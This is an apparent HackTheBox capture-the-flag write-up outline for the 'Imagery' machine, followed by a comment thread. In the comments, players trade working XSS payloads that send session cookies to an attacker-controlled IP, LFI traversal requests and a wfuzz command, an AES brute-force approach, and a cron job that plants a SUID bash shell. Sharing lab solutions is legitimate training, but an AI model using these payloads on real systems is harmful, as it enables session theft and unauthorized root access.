coolBro @coolBro123 4 days ago any content?
xone
5 days ago
xone
#hackthebox
Imagery HTB Writeup | HacktheBox | Season 9
Linux · Medium
High level attack flow
- Recon — port 8000: web app (image gallery) and SSH open.
- Register a regular account, use bug report / XSS to steal an admin session cookie → access admin panel.
- Admin log endpoint has LFI (directory traversal) — retrieve db.json and other app files.
- Analyse api_edit.py (image transform handler) — crop operation uses shell=True and concatenates parameters → command injection possible.
- Use a privileged account (test user) to upload an image and trigger the crop transform with a command injection payload → reverse shell.
- On the box: read /var/backup/web_20250806_120723.zip.aes (world-readable) and exfiltrate.
- Crack / decrypt the AES-Crypt .aes backup offline with a wordlist (rockyou) using pyAesCrypt wrapper → recover archive → inspect db.json to find other credentials/hashes.
- Use an obtained user credential to SSH/switch to the user account and read user.txt.
- Privilege escalation: the user can run /usr/local/bin/charcol via sudo — use charcol -R or the interactive charcol shell to reset/pass into a no-password shell, then schedule a recurring task (or set SUID on /usr/bin/bash) to get root → read root.txt.
Access is restricted by HackTheBox rules#
The solution to the problem can be published in the public domain after her retirement.
Look for a non-public solution to the problem in the telegram channel .
Comments 44
Confuse_pe... @confuse 3 days ago Register a regular account, use bug report / XSS to steal an admin session cookie → access admin panel. i am trying to do this but every time i report the bug with xss in it. i don't get any return back cookie.
lexi143 @Lexi143 3 days ago @confuse start a listener on your machine on 8000 Then do a bug report using this: script fetch("http://YOUR-IP:8000?" + document.cookie) script You’ll need to add <> and <\> to as I couldn’t add it here I did both subject and body, you should then get a response from your target IP with the session cookie
dev @dev 3 days ago @Lexi143 can tell me how ?
Alex @Alex-cyber 3 days ago @Lexi143 I put the exact command with the <> on the title and body and I still got nothing on my listener, do you know why ?
lexi143 @Lexi143 3 days ago @Alex-cyber my mistake. You don’t need script. Just run the following in the bug report : img src=x onerror=“new Image().src=‘http://your-ip:8000/?=‘+encodeURIComponent(document.cookie)” wrap this command in<>. Again I did this in Bug name and bug details.. And just make sure your listener is set on 8000. I used python3 -m http.server 8000 for my listener
Alapatra t... @alapatra-toli-10 3 days ago @Lexi143 i have tried this and still got no response from the server i only got bug submited. admin review is in progress. but still got no cookie response.
Sentinal @sentinal36 3 days ago @alapatra-toli-10 try iframe with fetch and wait a minute
Alapatra t... @alapatra-toli-10 3 days ago @sentinal36 i have been waited for reply from about 20 minutes
Sentinal @sentinal36 3 days ago @alapatra-toli-10 iframe src=\"javascript:fetch('http://IP:Port/?cookie='+encodeURIComponent(document.cookie))\" try this
Sentinal @sentinal36 3 days ago @sentinal36 less than sign is being deleted. You need to put it at the beginning and the end
Alapatra t... @alapatra-toli-10 3 days ago @sentinal36 why my netcat or python http server not receiving this i am using pwnbox to test. previous xss not worked and this one also not working.
Sentinal @sentinal36 2 days ago @alapatra-toli-10 iframe src=\"javascript:var x=new XMLHttpRequest();x.open('GET','http://IP:PORT/?c='+document.cookie,true);x.send();\" maybe that work, if it doesn't there has to be a problem with machine or vpn whatever bc it worked for me
Alapatra t... @alapatra-toli-10 2 days ago @sentinal36, thank you for giving me hint. i have already completed the xss process. My firewall intrupting the three way handshake. i have allowed it in my firewall. thank you for helping me.
test @test 2 days ago @Lexi143 I tried bro but it escapes <> ? what should I do
Peter
@petpan
2 days ago
@test
Kali# python3 -m http.server 1337
Website Bug Report -> Bug Name / Summary :
Peter
@petpan
2 days ago
@test
Peter @petpan 2 days ago @test This string should be inside < > img src=x onerror=fetch('http://YOUR IP ADDRESS:1337/?c='+btoa(document.cookie))
Mr Orbit @0x0r61t 2 days ago @Lexi143 I got cookie in reply but they gives me my cookie back to me
test @test 2 days ago @petpan I have a doubt how can we confirm that there exist a db.json file at that path?
test @test 2 days ago @0x0r61t try having something meaningful on the like "image upload issue"
Alapatra t... @alapatra-toli-10 1 day ago @test you can check backward directory like cd ../../hello_world
Alapatra t... @alapatra-toli-10 1 day ago how can i crack the aes should i go with bruteforce or password was stored in some directory or path. i need a hint.
test @test 1 day ago @alapatra-toli-10 nahh bro I have found the web user how did you guys confirm that there exists a db.json file at the path?
Alapatra t... @alapatra-toli-10 1 day ago @test you can check the python code there is a register path with saves the data in db.json with hashimg the password. That way i know there is file that saves the current credentials of qll the user.
Peter @petpan 1 day ago @test ┌──(Lucifer㉿TheDevil)-[~/HTB/Imagery/PP] └─$ wfuzz -c -z file,paths.txt -u 'http://imagery.htb:8000/admin/get_system_log?log_identifier=FUZZ' -H 'Cookie: session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNzR8A.7Zk7t9Y-cQcpWMVHoe99Kbr6yxk' --hc 404
Peter @petpan 1 day ago @test paths.txt ... snippet .... ../db.json ../../db.json ../../../db.json ../db.jason ../../db.jason db.json /data/db.json /config/db.json /backup/db.json
test @test 15 hours ago @petpan ohh thanks man where did you get this wordlists
test @test 15 hours ago @alapatra-toli-10 what was the name of the file bro
heisenberg @heisenberg 3 hours ago @petpan bro how did u come up with this wordlist and how to retrieve all files in the directory ?
qwerty @qwerty 1 day ago i can trigger /etc/passwd file...but how to find other files like db.json,app.py...?what would be the path for other files....?
Peter @petpan 1 day ago @qwerty Use burp for that GET /admin/get_system_log?log_identifier=../db.json HTTP/1.1
Peter @petpan 1 day ago @qwerty or web browser: http://imagery.htb:8000/admin/get_system_log?log_identifier=../db.json
Sentinal @sentinal36 1 day ago @qwerty dude first check ../../../../proc/self/environ that gives you a path that web application running on after that you ll try to add known names like db.json , api.py, app.py (../../../../bla/bla/app.py)
test @test 15 hours ago @sentinal36 its empty bruh
heisenberg @heisenberg 3 hours ago @sentinal36 bro like, how to retrieve all files in the directory ?
Alapatra t... @alapatra-toli-10 1 day ago can anyone help me with the aes file how can i crack it. i am trying to bruteforce the password at least 5 hrs and still no success with rockyou.txt
Sentinal @sentinal36 1 day ago @alapatra-toli-10 pip3 install pyAesCrypt after that ask a ai service (deepseek, gemini whatever) to write a bruteforce script for you with rockyou.txt
Alapatra t... @alapatra-toli-10 1 day ago @sentinal36 i already did that still no response. I have already used 700000+ password and still going.
Alapatra t... @alapatra-toli-10 1 day ago @sentinal36 i have tried and wait 9 hours and at last it says password not found. can anyone help me.
raphaeltot... @raphaeltotoso 1 day ago How can i privilege escalate using charcol ? Do you have the command line ? I'm triyng to execute auto add --schedule "* * * * *" --command "cp /bin/bash /tmp/pwn && chmod +s /tmp/pwn" --name "romeu" and after this /tmp/pwn -p but this is not working
Alapatra t... @alapatra-toli-10 21 hours ago @raphaeltotoso you don't have to use the charcol. by the way you can ssh the web and use this command /usr/bin/bash -p this will help you enter bash and you can have the root access. i have finally finish this machine thank you "" xone "" to providing this great hint and also thank you all the players that help me providing the hint.
noclue @noclue 11 hours ago @raphaeltotoso I also tried this one and the copy doesn't work somehow, but the original /bin/bash file can be used to do privilege escalation, just add -p. concerning that I can't login via SSH like other guys here, this might be another bug i guess.
Alapatra t... @alapatra-toli-10 10 hours ago @noclue there is a secret key. Which help you create authorized key in the web which will help us connect ssh in web. Yes you can use original bash command.
